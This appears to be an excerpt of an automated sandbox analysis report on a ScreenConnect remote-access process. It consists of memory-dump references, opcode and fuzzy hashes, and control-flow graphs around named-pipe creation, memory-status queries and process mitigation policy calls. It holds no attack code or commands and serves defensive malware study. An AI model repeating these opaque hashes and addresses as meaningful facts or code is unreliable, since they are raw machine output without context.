                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f7c124cdac9f09596c79d88ae1b09b7a223611ba27379d6ffc93da474b533fd
                                                                      • Instruction ID: 302b8e54ed55f2653e598bf1afe3375aac76236cfc0a5692ec9bacab3d7d79c2
                                                                      • Opcode Fuzzy Hash: 8f7c124cdac9f09596c79d88ae1b09b7a223611ba27379d6ffc93da474b533fd
                                                                      • Instruction Fuzzy Hash: 35F0653540D69C5FCF42DF64D4618D67FB0FE56310B0541C7E059CB062D7219A5ACB82
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f2a237f226a73cfc1fbd838c3acb3459f639732612d8162f41b34cb0558dd9d
                                                                      • Instruction ID: 7390e16d9257db8425088d94cd73847fa113e9bd658953873940f024662d3060
                                                                      • Opcode Fuzzy Hash: 9f2a237f226a73cfc1fbd838c3acb3459f639732612d8162f41b34cb0558dd9d
                                                                      • Instruction Fuzzy Hash: 4CE0DF2160F3D54FDB539B3888A88E13FA0EE1322030981EFD485CF0B3E5189A89C782
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e806ee69a04d3c3e8ba93037018dbb46b8dd2c437de0817ac692741bba6f126
                                                                      • Instruction ID: 496d9d6992a8731276c9523ff28790e87be4801cbea4abae3c7d91f48fb1dc5a
                                                                      • Opcode Fuzzy Hash: 5e806ee69a04d3c3e8ba93037018dbb46b8dd2c437de0817ac692741bba6f126
                                                                      • Instruction Fuzzy Hash: 47E08C16B4EA1B02FB7C61E678A13B564D19F04391F0A407EA42DC48E9DC9CAE808592
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8496e21985241a21aa1773cb843b13a606cdd80df643472c48351b373c9c9ce3
                                                                      • Instruction ID: 41c8f01b48759f1482c06148ffee133965836c3c82aba9d63d0f6e235927cb63
                                                                      • Opcode Fuzzy Hash: 8496e21985241a21aa1773cb843b13a606cdd80df643472c48351b373c9c9ce3
                                                                      • Instruction Fuzzy Hash: 2DD01212F1E96D0AD5A5626C38612E941D5DB9815174911F3E42CC629EEC085D8143D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 454232dcf8058cccb96898cebe9898c5d0872939ceade0badd0c7025267d384e
                                                                      • Instruction ID: 5bc6f8ba8e9cb8d17163a85b301a31d3d4a3be073e6d3e43b98605a8be84e173
                                                                      • Opcode Fuzzy Hash: 454232dcf8058cccb96898cebe9898c5d0872939ceade0badd0c7025267d384e
                                                                      • Instruction Fuzzy Hash: 83C09B10F1A54E57F564FBA4447117D11527F89200B93843EF01D851A6CD3C77115945
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fbafd006442ebdadfd2c062062598a7a7aaf40fd7338f1571b4347fbe383d38
                                                                      • Instruction ID: 2694424e300b1362f541984a53640f7c6392bd801cdab2c6ea3de9c0b4d29909
                                                                      • Opcode Fuzzy Hash: 3fbafd006442ebdadfd2c062062598a7a7aaf40fd7338f1571b4347fbe383d38
                                                                      • Instruction Fuzzy Hash: BCA00200F1F91E96E471B5D4002117D04411F55610B62817AE05D851B6CE1D7B521996

                                                                      Execution Graph

                                                                      Execution Coverage:13.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:18.8%
                                                                      Total number of Nodes:16
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 16075 7ffd9b708fb4 16079 7ffd9b708fb7 16075->16079 16076 7ffd9b709159 GlobalMemoryStatusEx 16078 7ffd9b709185 16076->16078 16077 7ffd9b7090b2 16079->16076 16079->16077 16080 7ffd9b3f8014 16082 7ffd9b3f801d 16080->16082 16081 7ffd9b3f8082 16082->16081 16083 7ffd9b3f80f6 SetProcessMitigationPolicy 16082->16083 16084 7ffd9b3f8152 16083->16084 16067 7ffd9b3f3662 16068 7ffd9b4161f0 ConnectNamedPipe 16067->16068 16070 7ffd9b4162a2 16068->16070 16071 7ffd9b3f3642 16072 7ffd9b416050 CreateNamedPipeW 16071->16072 16074 7ffd9b416183 16072->16074

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 285 7ffd9b3f3642-7ffd9b4160ba 288 7ffd9b4160c4-7ffd9b416181 CreateNamedPipeW 285->288 289 7ffd9b4160bc-7ffd9b4160c1 285->289 291 7ffd9b416183 288->291 292 7ffd9b416189-7ffd9b4161bc 288->292 289->288 291->292
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2489174969-0
                                                                      • Opcode ID: 99008a3d405c1c4144be27c6e46fe3a27932dfaa7a86662261a5ffee048cb71e
                                                                      • Instruction ID: b90edd816ab630c1b079a9d8c523b5746d5c13c40bdf6d48ae23e7ab11c63fd9
                                                                      • Opcode Fuzzy Hash: 99008a3d405c1c4144be27c6e46fe3a27932dfaa7a86662261a5ffee048cb71e
                                                                      • Instruction Fuzzy Hash: 7951A07191CA1C8FDB68EF5C9805BE9BBE0FB59710F1042AEE44ED3251CB70A9418BC1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 126 7ffd9b708fb4-7ffd9b708fb6 127 7ffd9b708fb7-7ffd9b708fbb 126->127 128 7ffd9b708fbd-7ffd9b708fc5 127->128 129 7ffd9b708fc6-7ffd9b70901a 127->129 128->129 129->127 132 7ffd9b70901c-7ffd9b70902a 129->132 134 7ffd9b709074-7ffd9b709087 132->134 135 7ffd9b70902c-7ffd9b709055 132->135 139 7ffd9b7090f8-7ffd9b7090fa 134->139 140 7ffd9b709089-7ffd9b70908d 134->140 136 7ffd9b7090ae 135->136 137 7ffd9b709057-7ffd9b70905a 135->137 143 7ffd9b7090af 136->143 141 7ffd9b7090db-7ffd9b7090df 137->141 142 7ffd9b70905c-7ffd9b70905e 137->142 144 7ffd9b709097 139->144 145 7ffd9b7090fc-7ffd9b70910c 139->145 146 7ffd9b70910e-7ffd9b70910f 140->146 147 7ffd9b70908f-7ffd9b709091 140->147 173 7ffd9b7090e0 141->173 148 7ffd9b709060 142->148 149 7ffd9b7090da 142->149 150 7ffd9b7090b0 143->150 151 7ffd9b70912b-7ffd9b70912d 143->151 155 7ffd9b709113-7ffd9b709118 144->155 156 7ffd9b709099 144->156 153 7ffd9b70910d 145->153 157 7ffd9b709110-7ffd9b709111 146->157 158 7ffd9b709159-7ffd9b709183 GlobalMemoryStatusEx 146->158 147->153 154 7ffd9b709093-7ffd9b709095 147->154 160 7ffd9b709062-7ffd9b709064 148->160 161 7ffd9b7090a3 148->161 149->141 162 7ffd9b709131-7ffd9b709157 150->162 163 7ffd9b7090b1 150->163 153->146 154->144 165 7ffd9b709119-7ffd9b70911e 155->165 156->141 164 7ffd9b70909b-7ffd9b70909d 156->164 157->155 169 7ffd9b709185 158->169 170 7ffd9b70918b-7ffd9b7091b2 158->170 160->173 174 7ffd9b709066 160->174 166 7ffd9b70911f-7ffd9b709123 161->166 167 7ffd9b7090a5 161->167 162->158 171 7ffd9b7090b2-7ffd9b7090bd 163->171 172 7ffd9b7090f3-7ffd9b7090f7 163->172 164->165 175 7ffd9b70909f-7ffd9b7090a1 164->175 165->166 176 7ffd9b709125-7ffd9b70912a 166->176 177 7ffd9b7090a6-7ffd9b7090a7 167->177 178 7ffd9b7090e7-7ffd9b7090e9 167->178 169->170 182 7ffd9b7090c5-7ffd9b7090d9 171->182 172->139 179 7ffd9b709068-7ffd9b70906a 174->179 180 7ffd9b7090a9 174->180 175->161 176->151 177->180 183 7ffd9b7090ef 178->183 184 7ffd9b7090eb-7ffd9b7090ee 178->184 185 7ffd9b7090e6 179->185 186 7ffd9b70906c 179->186 180->176 181 7ffd9b7090ab-7ffd9b7090ad 180->181 181->136 182->149 187 7ffd9b7090f1 183->187 188 7ffd9b7090f2 183->188 184->183 185->178 186->143 189 7ffd9b70906e-7ffd9b709073 186->189 187->188 188->172 189->134
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1818503332.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b700000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 1036d0225a7f3bcf86496957733011091d7f68cb6dba76c7adf58f95396542c3
                                                                      • Instruction ID: 4af764073f8bba12fe9ff3ff8b93bec9632abe47849f3d4d12001da28bd76965
                                                                      • Opcode Fuzzy Hash: 1036d0225a7f3bcf86496957733011091d7f68cb6dba76c7adf58f95396542c3
                                                                      • Instruction Fuzzy Hash: AE811931A0E78E4FE775D7A888296B87FE0EF52320F0542BBD09DC75B3DA54650A8341

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 32c6a6dab82705be07b0ef68f969eda328337d89dec535e44f48862f731e8ee3
                                                                      • Instruction ID: 9269778f4e515868a7a41c4c20f4b48c93eb5a1ae5d69f695a311a955f1da570
                                                                      • Opcode Fuzzy Hash: 32c6a6dab82705be07b0ef68f969eda328337d89dec535e44f48862f731e8ee3
                                                                      • Instruction Fuzzy Hash: 5D512B31E0DB494FEB29EFA8984A5E97BE0EF55310F04027EE059C3192DF78A5458791

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 419 7ffd9b3f3662-7ffd9b4162a0 ConnectNamedPipe 423 7ffd9b4162a2 419->423 424 7ffd9b4162a8-7ffd9b4162f0 call 7ffd9b4162f1 419->424 423->424
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2191148154-0
                                                                      • Opcode ID: d59a5f50b3eed611ea7560590ce6e99c00445d45566a120f8fc912e5ed6de01b
                                                                      • Instruction ID: cd14c21f3e177d0891505a03440fe4fee02a8e688454a62b75b695edfa4b5620
                                                                      • Opcode Fuzzy Hash: d59a5f50b3eed611ea7560590ce6e99c00445d45566a120f8fc912e5ed6de01b
                                                                      • Instruction Fuzzy Hash: BB316E70E08A1C8FDB58EF98C849BE9B7F1FB69311F10826AD00DD7255DB74A945CB81

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 428 7ffd9b3f3aa2-7ffd9b3f80ef 430 7ffd9b3f80f6-7ffd9b3f8150 SetProcessMitigationPolicy 428->430 431 7ffd9b3f8158-7ffd9b3f8187 430->431 432 7ffd9b3f8152 430->432 432->431
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 1d6d324456c079a6f5267d1d9ecb1bdb6ce4146bf53a9a10f220649d858dca18
                                                                      • Instruction ID: e472583dbb76c3aa78d664b754161fad1d6dda680a9365f44f5d00591ef24670
                                                                      • Opcode Fuzzy Hash: 1d6d324456c079a6f5267d1d9ecb1bdb6ce4146bf53a9a10f220649d858dca18
                                                                      • Instruction Fuzzy Hash: 0F21B631918B188FDB28AF9D9C4AAF97BE0EB69711F00423EE059D3251DB74B8458B91